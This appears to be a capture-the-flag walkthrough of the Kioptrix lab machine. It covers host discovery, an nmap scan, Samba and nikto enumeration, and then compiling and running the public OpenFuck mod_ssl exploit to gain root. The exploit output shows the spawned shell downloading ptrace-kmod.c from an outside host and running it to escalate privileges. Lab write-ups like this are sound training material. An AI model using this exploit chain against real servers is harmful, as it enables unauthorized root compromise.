This one implied to do a proper enumeration of the host to find a vulnerable Apache web server to the OpenFuck vulnerability to gain directly root access.

Find the target machine (2 methods)

nmap -sP TARGET_NETWORK/24|grep 192

netdiscover -r TARGET_NETWORK/24


Initial scan

root@kali:# mkdir nmap; nmap -sC -sV -oA nmap/initial TARGET_IP
        Starting Nmap 7.70 ( ) at 2018-07-24 14:44 WAT
        Nmap scan report for TARGET_IP
        Host is up (0.00054s latency).
        Not shown: 994 closed ports
        22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
        | ssh-hostkey:
        |   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
        |   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
        |_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
        |_sshv1: Server supports SSHv1
        80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
        | http-methods:
        |_  Potentially risky methods: TRACE
        |_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-title: Test Page for the Apache Web Server on Red Hat Linux
        111/tcp  open  rpcbind     2 (RPC #100000)
        | rpcinfo:
        |   program version   port/proto  service
        |   100000  2            111/tcp  rpcbind
        |   100000  2            111/udp  rpcbind
        |   100024  1           1024/tcp  status
        |_  100024  1           1024/udp  status
        139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
        443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-title: 400 Bad Request
        |_ssl-date: 2018-07-24T13:57:13+00:00; +12m25s from scanner time.
        | sslv2:
        |   SSLv2 supported
        |   ciphers:
        |     SSL2_DES_192_EDE3_CBC_WITH_MD5
        |     SSL2_RC2_128_CBC_WITH_MD5
        |     SSL2_RC4_64_WITH_MD5
        |     SSL2_RC4_128_WITH_MD5
        |     SSL2_RC4_128_EXPORT40_WITH_MD5
        |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
        |_    SSL2_DES_64_CBC_WITH_MD5
        1024/tcp open  status      1 (RPC #100024)
        MAC Address: 00:0C:29:93:FC:AA (VMware)

        Host script results:
        |_clock-skew: mean: 12m24s, deviation: 0s, median: 12m24s
        |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
        |_smb2-time: Protocol negotiation failed (SMB2)

So we have:
- 22 OpenSSH version 2.9p2
- 80 Apache 1.3.20 (mod_ssl/2.8.4 + OpenSSL/0.9.6b)
- 111 RPC
- 139 Samba (MyGROUP)
- 443 Apache SSL of the same server
- 1024 RPC

Ok, seems we have to deals with SSL or SAMBA.


Trying to get the version of Samba used

root@kali:# smbclient -L TARGET_IP -N
    WARNING: The "syslog" option is deprecated
    Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
    Reconnecting with SMB1 for workgroup listing.
    Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
    Anonymous login successful

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------

enum4linux returns the same result cause it uses smbclient binary too. So I cannot grab version number. Let's pass to SSL. (check addition at the end of this article)


Launch some web server scanner, it will found rapidly some usefull informations as the web server is pretty old now ...

root@kali:# nikto -host -port 443
    + OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
    + OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
    + OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
    + mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell., OSVDB-756.



This is related to the OpenFuckV2 exploit

root@kali:# head 764.c
     * E-DB Note: Updating OpenFuck Exploit ~
     * OF version r00t VERY PRIV8 spabam
     * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
     * objdump -R /usr/sbin/httpd|grep free to get more targets
     * #hackarena

root@kali:# gcc -o OpenFuck 764.c -lcrypto
    764.c:20:10: fatal error: openssl/ssl.h: No such file or directory
     #include <openssl/ssl.h>
    compilation terminated.

Ok, it ssems we need some missing packages.


To work this around I had to install libssl & libssl-devel, then compile the exploit.

apt install libssl-dev libssl1.0-dev
gcc -o OpenFuck 764.c -lcrypto

First read the Usage part, then select the correct version of the target web server (0x6a or 0x6b).

    : Usage: ./OpenFuck target box [port] [-c N]
      target - supported box eg: 0x00
      box - hostname or IP address
      port - port for ssl connection
      -c open N connections. (use range 40-50 if u dont know)

root@kali:# ./OpenFuck |grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

Finish by executing the exploit, You will be logged as root at the end of the process.

root@kali:# ./OpenFuck 0x6b TARGET_IP -c 50
    * OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
    * by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
    * #hackarena                                     *
    * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
    * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
    * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

    Connection... 50 of 50
    Establishing SSL connection
    cipher: 0x4043808c   ciphers: 0x80f8088
    Ready to send shellcode
    Spawning shell...
    bash: no job control in this shell
    exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
               => `ptrace-kmod.c'
    Connecting to connected!
    HTTP request sent, awaiting response... 301 Moved Permanently
    Location: [following]
               => `ptrace-kmod.c'
    Connecting to connected!
    HTTP request sent, awaiting response... 200 OK
    Length: 3,921 [text/x-csrc]

        0K ...                                                   100% @   3.74 MB/s

    06:55:20 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

    [+] Attached to 1039
    [+] Waiting for signal
    [+] Signal caught
    [+] Shellcode placed at 0x4001189d
    [+] Now wait for suid shell...
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


After reading some others walkthrough of this box, It seems I have an issue with my enum4linux report that must have give me a version number. So, I've reloaded the OffSec Kali Box (2018.2) and even from scratch I cannot get samba version with a simple smbclient -L TARGET_IP ...